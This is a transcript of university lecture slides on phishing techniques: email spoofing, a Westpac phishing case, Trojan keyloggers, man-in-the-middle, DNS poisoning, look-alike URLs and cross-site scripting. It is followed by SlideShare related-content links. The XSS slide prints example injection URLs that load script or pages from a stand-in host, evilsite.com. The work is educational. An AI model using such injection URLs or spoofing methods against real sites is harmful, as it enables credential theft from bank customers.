SlideShare ist ein Scribd-Unternehmen logo
1 von 49
PhishingPhishing
1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
About me
 Currently, Lecturer in this department for
351 days 
 Former Research Intern in M3C Laboratory,
University of Bolton, UK
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2
For you
 Email me at rushdecoder@yahoo.com if
you want
 My homepage and course materials are at
http://rushdishams.googlepages.com
 You need to join
http://groups.google.com/group/csebatche
sofrushdi
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 3
Phishing
 The number of unique e-mail-based fraud
attacks detected in November 2005 was
16,882, almost double the 8,975 attacks
launched in November 2004, said the report
(Anti-Phishing Working Group)
 Phishing e-mails pretend to come from
legitimate companies, such as banks and e-
commerce sites
 Used by criminals to try and trick Web users
into revealing personal information and
account detailsRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4
Phishing
 The number of brands targeted increased
by nearly 50 percent over the course of
2005, from 64 percent to 93 percent in
November 2006
 "One big attack will temporarily hurt a
brand, but the increase in e-commerce is
not slowing down,"
(Mark Murtagh, Websense technical director)
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 5
Phishing
 Top brands continue to be hijacked, with
phishers using established names to try to lure
people to their sites
 eBay is often spoofed, for obvious reasons
 Google is increasingly being targeted because
of its expansion into different business
application models.
 The big banking names are used too--HSBC,
Citigroup, Lloyds--all the major brands
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 6
Phishing
 There's no point in using local names if the
attack is global
 Attacks are becoming increasingly
sophisticated
 Web sites are hosting keylogging malicious
software
 Before, people had to click on a site to
download malicious code.
 If they thought a web site 'phishy,' they could
leave and probably not be harmed.
 Now. with most phishing sites they just have to
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 7
Phishing
 Twenty-five percent of those sites now host
keylogging code
 If you visit one you will probably open yourself
to identity theft or fraud
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 8
Exploiting the Weakness
 Why is it that Crooks are able to mount an
attack?
 What are the weaknesses that they exploit?
 Richness of functionality
Complex systems can have program bugs
 Increasing interconnectivity
Separate functions of any system are combined
and interconnected via Internet
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 9
Exploiting the Weakness
 Expanding market in exploits
Very few people requires as the technical
gadgets are impressive and cheap
 The scale of content based attacks
Everyone uses e-mails and e-mails are
exploitable. Then why not?
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 10
Social Engineering Factors
 Phishing attacks rely upon a mix of technical
deceit and social engineering practices.
 In the majority of cases the Phisher must
persuade the victim
 The victim intentionally performs a series of
actions that will provide access to
confidential information
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 11
Social Engineering Factors
 Communication channels such as email,
web-pages, IRC and instant messaging
services are popular.
 Phisher must impersonate a trusted source
(e.g. the helpdesk of their bank, automated
support response from their favourite
online retailer, etc.) for the victim to
believe.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 12
Social Engineering Factors
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 13
Phishing Techniques
 Phishing attacks initiated by email are the
most common.
 Using Trojan Network, Phishers can deliver
specially crafted emails to millions of
legitimate “live” email addresses within a
few hours
 Sometimes phishers purchase e-mail
address
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 14
Phishing Techniques
 Utilising well known flaws in the common
mail server communication protocol
(SMTP), Phishers are able to create emails
with fake “Mail From:” headers and
impersonate any organisation they choose.
 Any customer replies to the phishing email
will be sent to them.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 15
Phishing Techniques
 Official looking and sounding emails
 Copies of legitimate corporate emails with
minor URL changes
 HTML based email used to obfuscate target
URL information
 Standard virus/worm attachments to emails
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 16
Phishing Techniques
 A plethora of anti spam-detection inclusions
 Crafting of “personalised” or unique email
messages
 Fake postings to popular message boards
and mailing lists
 Use of fake “Mail From:” addresses and
open mail relays for disguising the source of
the email
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 17
A real-life phishing example
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 18
Things to note
 The email was sent in HTML format
 Lower-case L’s have been replaced with
upper-case I’s. This is used to help bypass
many standard anti-spam filters
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 19
Things to note
 Within the HTML-based email, the URL link
https://oIb.westpac.com.au/ib/defauIt.asp in fact
points to a escape-encoded version of the following
URL:
http://olb.westpac.com.au.userdll.com:4903/ib/index.
htm
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 20
Things to note
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 21
Things to note
 The non-standard HTTP port of 4903 can be
attributed to the fact that the Phishers fake
site was hosted on a third-party PC that had
been previously compromised by an
attacker Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22
Things to note
 Recipients that clicked on the link were
then forwarded to the real Westpac
application.
 However a JavaScript popup window
containing a fake login page was presentedRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23
Things to note
 This fake login window was designed to capture and
store the recipient’s authentication credentials
 JavaScript also submitted the authentication
information to the real Westpac application
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 24
Where are they standing now?
 The inclusion of HTML disguised links
 The use of third-party supplied, or fake,
banner advertising graphics to lure
customers
 The use of web-bugs (hidden items within
the page – such as a zero-sized graphic) to
track a potential customer
 The use of pop-up or frameless windows to
disguise the true source of the Phishers
message.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 25
Where are they standing now?
 Embedding malicious content within the
viewable web-page
 installs software of the Phishers choice (e.g.
key-loggers, screen-grabbers, back-doors
and other Trojan horse programs).
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 26
Banner Advertising
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 27
IRC and IM
 New on the Phishers radar, IRC and Instant
Messaging (IM) forums are likely to become
a popular phishing ground.
 The common usage of Bots (automated
programs that listen and participate in
group discussions) in many of the popular
channels,
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 28
Trojan Hosts
 the delivery source is increasingly becoming
home PC’s that have been previously
compromised.
 Trojan horse program has been installed
which allows Phishers (along with
Spammers, Warez Pirates, DDoS Bots, etc.)
to use the PC as a message propagator.
 tracking back a Phishing attack to an
individual initiating criminal is extremely
difficult.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 29
Trojan Hosts
 the installation of Trojan horse software is
on the increase, despite the efforts of large
anti-virus companies.
 operate large networks of Trojan
deployments (networks consisting of
thousands of hosts are not uncommon)
 Phishers must be selective about the
information they wish to record or be faced
with information overload.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 30
Information Specific Trojans
 You have come across a file named
JavaUtil.zip.
 But you forgot that you have “do not show
known file extensions” in your Windows
setting.
 Hmm, then JavaUtil.zip originally maybe a
.exe file whose full name is JavaUtil.zip.exe
 You, unfortunately, click that zip file to
unzip it.
 You are doomed! 
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 31
Information Specific Trojans
 Early in 2004, a Phisher created a custom key-logger
Trojan.
 The Trojan key-logger was designed specifically to
capture all key presses within windows with the titles
of various names including:- commbank,
Commonwealth, NetBank, Citibank, Bank of America,
e-gold, e-bullion, e-Bullion, evocash, EVOCash,
EVOcash, intgold, INTGold, paypal, PayPal, bankwest,
Bank West, BankWest, National Internet Banking, cibc,
CIBC, scotiabank and ScotiaBank
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 32
Phishing Attack Vectors
 Man-in-the-middle Attacks
 URL Obfuscation Attacks
 Cross-site Scripting Attacks
 Preset Session Attacks
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 33
Man in the Middle Attacks
 the attacker situates themselves between
the customer and the real web-based
application, and proxies all communications
between the systems.
 This form of attack is successful for both
HTTP and HTTPS communications.
 The customer connects to the attackers
server as if it was the real site
 The attackers server makes a simultaneous
connection to the real site.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 34
Man in the Middle Attacks
 The attackers server then proxies all
communications between the customer and
the real web-based application server
 In the case of secure HTTPS
communications, an SSL connection is
established between the customer and the
attackers proxy
 while the attackers proxy creates its own
SSL connection between itself and the real
server.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 35
Man in the Middle Attacks
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
Man in the Middle Attacks
 The attacker must be able to direct the
customer to their proxy server instead of
the real server.
 This may be carried out through a number
of methods:
 Transparent Proxies
 DNS Cache Poisoning
 URL Obfuscation
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 37
Transparent Proxies
 Situated on the same network segment or
located on route to the real server
 a transparent proxy service can intercept all
data by forcing all outbound HTTP and
HTTPS traffic through itself.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 38
DNS Cache Poisoning
 be used to disrupt normal traffic routing by
injecting false IP addresses for key domain
names.
 the attacker poisons the DNS cache of a
network firewall so that all traffic destined
for the MyBank IP address now resolves to
the attackers proxy server IP address
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 39
URL Obfuscation
 the attacker tricks the customer into connecting to
their proxy server instead of the real server.
 the customer may follow a link to
http://privatebanking.mybank.com.ch
http://mybank.privatebanking.com
http://privatebanking.mybonk.com
http://privatebanking.mybánk.com
http://privatebanking.mybank.hackproof.com
 And the real one is
http://privatebanking.mybank.com
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 40
Third party shortened URL
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 41
Cross Site Scripting (XSS)
 make use of custom URL or code injection
into a valid web-based application URL
 the result of poor web-application
development processes.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 42
Cross Site Scripting (XSS)
 Full HTML substitution such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
 Inline embedding of scripting content, such
as:
http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
 Forcing the page to load external scripting
code, such as:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 43
Cross Site Scripting (XSS)
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 44
Preset Session Attack
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 45
Hidden Frame
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 46
Graphical Substitution
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 47
References
 The Phishing Guide by Next Generation
Security Software Software Limited.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 48
Related Papers
 Technical Trends in Phishing Attacks by
Jason Milletary
 Why Phishing Works by Dhamija et al.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 49

Weitere ähnliche Inhalte

Was ist angesagt?

IRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing SitesIRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing SitesIRJET Journal
 
Spear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaSpear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaRaghunath G
 
Phishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationPhishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationCSCJournals
 
Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba   an innovative rule ...Phishing detection in ims using domain ontology and cba   an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...ijistjournal
 
IRJET- Detecting Malicious URLS using Machine Learning Techniques: A Comp...
IRJET-  	  Detecting Malicious URLS using Machine Learning Techniques: A Comp...IRJET-  	  Detecting Malicious URLS using Machine Learning Techniques: A Comp...
IRJET- Detecting Malicious URLS using Machine Learning Techniques: A Comp...IRJET Journal
 
Dealing with the threat of spoof and phishing mail attacks part 6#9 | Eyal ...
Dealing with the threat of spoof and phishing mail attacks   part 6#9 | Eyal ...Dealing with the threat of spoof and phishing mail attacks   part 6#9 | Eyal ...
Dealing with the threat of spoof and phishing mail attacks part 6#9 | Eyal ...Eyal Doron
 
phishing and pharming - evil twins
phishing and pharming - evil twinsphishing and pharming - evil twins
phishing and pharming - evil twinsNilantha Piyasiri
 
Customer Involvement in Phishing Defence
Customer Involvement in Phishing DefenceCustomer Involvement in Phishing Defence
Customer Involvement in Phishing DefenceJordan Schroeder
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
 

Was ist angesagt? (12)

IRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing SitesIRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing Sites
 
Spear Phishing
Spear PhishingSpear Phishing
Spear Phishing
 
Spear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaSpear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishna
 
Aa4502172179
Aa4502172179Aa4502172179
Aa4502172179
 
Phishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationPhishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm Optimization
 
Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba   an innovative rule ...Phishing detection in ims using domain ontology and cba   an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...
 
IRJET- Detecting Malicious URLS using Machine Learning Techniques: A Comp...
IRJET-  	  Detecting Malicious URLS using Machine Learning Techniques: A Comp...IRJET-  	  Detecting Malicious URLS using Machine Learning Techniques: A Comp...
IRJET- Detecting Malicious URLS using Machine Learning Techniques: A Comp...
 
Dealing with the threat of spoof and phishing mail attacks part 6#9 | Eyal ...
Dealing with the threat of spoof and phishing mail attacks   part 6#9 | Eyal ...Dealing with the threat of spoof and phishing mail attacks   part 6#9 | Eyal ...
Dealing with the threat of spoof and phishing mail attacks part 6#9 | Eyal ...
 
Analyzing Social and Stylometric Features to Identify Spear phishing Emails
Analyzing Social and Stylometric Features to Identify Spear phishing EmailsAnalyzing Social and Stylometric Features to Identify Spear phishing Emails
Analyzing Social and Stylometric Features to Identify Spear phishing Emails
 
phishing and pharming - evil twins
phishing and pharming - evil twinsphishing and pharming - evil twins
phishing and pharming - evil twins
 
Customer Involvement in Phishing Defence
Customer Involvement in Phishing DefenceCustomer Involvement in Phishing Defence
Customer Involvement in Phishing Defence
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS Working
 

Andere mochten auch

Semi-supervised classification for natural language processing
Semi-supervised classification for natural language processingSemi-supervised classification for natural language processing
Semi-supervised classification for natural language processingRushdi Shams
 
L1 overview of software engineering
L1  overview of software engineeringL1  overview of software engineering
L1 overview of software engineeringRushdi Shams
 
AGMA Descontaminacion 2014
AGMA Descontaminacion   2014AGMA Descontaminacion   2014
AGMA Descontaminacion 2014joseCarou
 
Tomas directas sobre el-río Atuel - Mayo-2014
Tomas directas sobre el-río Atuel - Mayo-2014Tomas directas sobre el-río Atuel - Mayo-2014
Tomas directas sobre el-río Atuel - Mayo-2014Mario Guillermo Simonovich
 
Estudio sobre la afición por los toros en España
Estudio sobre la afición por los toros en EspañaEstudio sobre la afición por los toros en España
Estudio sobre la afición por los toros en EspañaJoaquín Mouriz
 
Presentación teléfono Hatim
Presentación teléfono HatimPresentación teléfono Hatim
Presentación teléfono Hatimjosetecnologies
 
Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316
Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316
Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316BC3 - Basque Center for Climate Change
 
061127
061127061127
061127Uskidz
 
Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...
Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...
Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...webikastaroa
 
Castilla en época de isabel i corregido
Castilla en época de isabel i corregidoCastilla en época de isabel i corregido
Castilla en época de isabel i corregidoMarc Soto
 
Guia 1 mujer_sociedad_finisecular[1]
Guia 1 mujer_sociedad_finisecular[1]Guia 1 mujer_sociedad_finisecular[1]
Guia 1 mujer_sociedad_finisecular[1]camilapepona
 
CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES PARA LA SOS...
CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES   PARA LA SOS...CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES   PARA LA SOS...
CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES PARA LA SOS...aristos1
 
Across Health Digital Barometer 2013
Across Health Digital Barometer 2013Across Health Digital Barometer 2013
Across Health Digital Barometer 2013Across Health
 

Andere mochten auch (20)

L4 vpn
L4  vpnL4  vpn
L4 vpn
 
L15 fuzzy logic
L15  fuzzy logicL15  fuzzy logic
L15 fuzzy logic
 
Semi-supervised classification for natural language processing
Semi-supervised classification for natural language processingSemi-supervised classification for natural language processing
Semi-supervised classification for natural language processing
 
L1 overview of software engineering
L1  overview of software engineeringL1  overview of software engineering
L1 overview of software engineering
 
Actividad 2
Actividad 2Actividad 2
Actividad 2
 
AGMA Descontaminacion 2014
AGMA Descontaminacion   2014AGMA Descontaminacion   2014
AGMA Descontaminacion 2014
 
Tomas directas sobre el-río Atuel - Mayo-2014
Tomas directas sobre el-río Atuel - Mayo-2014Tomas directas sobre el-río Atuel - Mayo-2014
Tomas directas sobre el-río Atuel - Mayo-2014
 
Estudio sobre la afición por los toros en España
Estudio sobre la afición por los toros en EspañaEstudio sobre la afición por los toros en España
Estudio sobre la afición por los toros en España
 
Presentación teléfono Hatim
Presentación teléfono HatimPresentación teléfono Hatim
Presentación teléfono Hatim
 
Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316
Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316
Training Caravan: Stefano Balbi [Aniturri BHI and Ikasbidea Ikastola] 20150316
 
Twitter at E-Tourism Summit
Twitter at E-Tourism SummitTwitter at E-Tourism Summit
Twitter at E-Tourism Summit
 
061127
061127061127
061127
 
Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...
Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...
Travel 2.0: Como adaptar la web de su hotel a las ultimas tendencias de Inter...
 
Castilla en época de isabel i corregido
Castilla en época de isabel i corregidoCastilla en época de isabel i corregido
Castilla en época de isabel i corregido
 
La CéLula
La CéLulaLa CéLula
La CéLula
 
Guia 1 mujer_sociedad_finisecular[1]
Guia 1 mujer_sociedad_finisecular[1]Guia 1 mujer_sociedad_finisecular[1]
Guia 1 mujer_sociedad_finisecular[1]
 
CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES PARA LA SOS...
CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES   PARA LA SOS...CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES   PARA LA SOS...
CONCEPCIÓN DE ECOSISTEMA EN EL MANEJO DE LOS RECURSOS NATURALES PARA LA SOS...
 
Arghos Tecnical Assistance
Arghos Tecnical AssistanceArghos Tecnical Assistance
Arghos Tecnical Assistance
 
Epidemiologia
Epidemiologia Epidemiologia
Epidemiologia
 
Across Health Digital Barometer 2013
Across Health Digital Barometer 2013Across Health Digital Barometer 2013
Across Health Digital Barometer 2013
 

Ähnlich wie L1 phishing

L5 understanding hacking
L5  understanding hackingL5  understanding hacking
L5 understanding hackingRushdi Shams
 
3 Hkcert Trend
3  Hkcert Trend3  Hkcert Trend
3 Hkcert TrendSC Leung
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
 
An overview study on cyber crimes in internet
An overview study on cyber crimes in internetAn overview study on cyber crimes in internet
An overview study on cyber crimes in internetAlexander Decker
 
Improving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association MiningImproving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association Miningtheijes
 
8 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 20208 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 2020SecPod Technologies
 
Phishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification AlgorithmsPhishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification AlgorithmsIRJET Journal
 
Advanced phishing for red team assessments
Advanced phishing for red team assessmentsAdvanced phishing for red team assessments
Advanced phishing for red team assessmentsJEBARAJM
 
Computer Fraud and Abuse TechniquesChapter 66-1.docx
Computer Fraud and Abuse TechniquesChapter 66-1.docxComputer Fraud and Abuse TechniquesChapter 66-1.docx
Computer Fraud and Abuse TechniquesChapter 66-1.docxpatricke8
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresIRJET Journal
 
Ethical hacking - Skills.pptx
Ethical hacking - Skills.pptxEthical hacking - Skills.pptx
Ethical hacking - Skills.pptxNargis Parveen
 
The Evolution of Phising Attacks
The Evolution of Phising AttacksThe Evolution of Phising Attacks
The Evolution of Phising AttacksBee_Ware
 
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...apidays
 
pypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjr
pypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjrpypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjr
pypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjrSurajGurushetti
 
Information-Security-Lecture-6.pptx
Information-Security-Lecture-6.pptxInformation-Security-Lecture-6.pptx
Information-Security-Lecture-6.pptxanbersattar
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsIRJET Journal
 
Malicious-URL Detection using Logistic Regression Technique
Malicious-URL Detection using Logistic Regression TechniqueMalicious-URL Detection using Logistic Regression Technique
Malicious-URL Detection using Logistic Regression TechniqueDr. Amarjeet Singh
 
Internet threats and defence mechanism
Internet threats and defence mechanismInternet threats and defence mechanism
Internet threats and defence mechanismCAS
 

Ähnlich wie L1 phishing (20)

L5 understanding hacking
L5  understanding hackingL5  understanding hacking
L5 understanding hacking
 
3 Hkcert Trend
3  Hkcert Trend3  Hkcert Trend
3 Hkcert Trend
 
Exploring And Investigating New Dimensions In Phishing
Exploring And Investigating New Dimensions In PhishingExploring And Investigating New Dimensions In Phishing
Exploring And Investigating New Dimensions In Phishing
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
An overview study on cyber crimes in internet
An overview study on cyber crimes in internetAn overview study on cyber crimes in internet
An overview study on cyber crimes in internet
 
Improving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association MiningImproving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association Mining
 
8 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 20208 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 2020
 
Phishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification AlgorithmsPhishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification Algorithms
 
Phishing
PhishingPhishing
Phishing
 
Advanced phishing for red team assessments
Advanced phishing for red team assessmentsAdvanced phishing for red team assessments
Advanced phishing for red team assessments
 
Computer Fraud and Abuse TechniquesChapter 66-1.docx
Computer Fraud and Abuse TechniquesChapter 66-1.docxComputer Fraud and Abuse TechniquesChapter 66-1.docx
Computer Fraud and Abuse TechniquesChapter 66-1.docx
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Ethical hacking - Skills.pptx
Ethical hacking - Skills.pptxEthical hacking - Skills.pptx
Ethical hacking - Skills.pptx
 
The Evolution of Phising Attacks
The Evolution of Phising AttacksThe Evolution of Phising Attacks
The Evolution of Phising Attacks
 
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
 
pypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjr
pypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjrpypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjr
pypt.pptx.shshjsjdjjdhdhhdhdhdhdhhdhdjdjdjdjjrejjr
 
Information-Security-Lecture-6.pptx
Information-Security-Lecture-6.pptxInformation-Security-Lecture-6.pptx
Information-Security-Lecture-6.pptx
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
 
Malicious-URL Detection using Logistic Regression Technique
Malicious-URL Detection using Logistic Regression TechniqueMalicious-URL Detection using Logistic Regression Technique
Malicious-URL Detection using Logistic Regression Technique
 
Internet threats and defence mechanism
Internet threats and defence mechanismInternet threats and defence mechanism
Internet threats and defence mechanism
 

Mehr von Rushdi Shams

Research Methodology and Tips on Better Research
Research Methodology and Tips on Better ResearchResearch Methodology and Tips on Better Research
Research Methodology and Tips on Better ResearchRushdi Shams
 
Common evaluation measures in NLP and IR
Common evaluation measures in NLP and IRCommon evaluation measures in NLP and IR
Common evaluation measures in NLP and IRRushdi Shams
 
Machine learning with nlp 101
Machine learning with nlp 101Machine learning with nlp 101
Machine learning with nlp 101Rushdi Shams
 
Natural Language Processing: Parsing
Natural Language Processing: ParsingNatural Language Processing: Parsing
Natural Language Processing: ParsingRushdi Shams
 
Types of machine translation
Types of machine translationTypes of machine translation
Types of machine translationRushdi Shams
 
L1 l2 l3 introduction to machine translation
L1 l2 l3  introduction to machine translationL1 l2 l3  introduction to machine translation
L1 l2 l3 introduction to machine translationRushdi Shams
 
Syntax and semantics
Syntax and semanticsSyntax and semantics
Syntax and semanticsRushdi Shams
 
Propositional logic
Propositional logicPropositional logic
Propositional logicRushdi Shams
 
Probabilistic logic
Probabilistic logicProbabilistic logic
Probabilistic logicRushdi Shams
 
Knowledge structure
Knowledge structureKnowledge structure
Knowledge structureRushdi Shams
 
Knowledge representation
Knowledge representationKnowledge representation
Knowledge representationRushdi Shams
 
L2 Intrusion Detection System (IDS)
L2  Intrusion Detection System (IDS)L2  Intrusion Detection System (IDS)
L2 Intrusion Detection System (IDS)Rushdi Shams
 
L2 l3 l4 software process models
L2 l3 l4  software process modelsL2 l3 l4  software process models
L2 l3 l4 software process modelsRushdi Shams
 
L13 why software fails
L13  why software failsL13  why software fails
L13 why software failsRushdi Shams
 
Lecture 14,15 and 16 file systems
Lecture 14,15 and 16  file systemsLecture 14,15 and 16  file systems
Lecture 14,15 and 16 file systemsRushdi Shams
 
Lecture 11,12 and 13 deadlocks
Lecture 11,12 and 13  deadlocksLecture 11,12 and 13  deadlocks
Lecture 11,12 and 13 deadlocksRushdi Shams
 
Lecture 7, 8, 9 and 10 Inter Process Communication (IPC) in Operating Systems
Lecture 7, 8, 9 and 10  Inter Process Communication (IPC) in Operating SystemsLecture 7, 8, 9 and 10  Inter Process Communication (IPC) in Operating Systems
Lecture 7, 8, 9 and 10 Inter Process Communication (IPC) in Operating SystemsRushdi Shams
 

Mehr von Rushdi Shams (20)

Research Methodology and Tips on Better Research
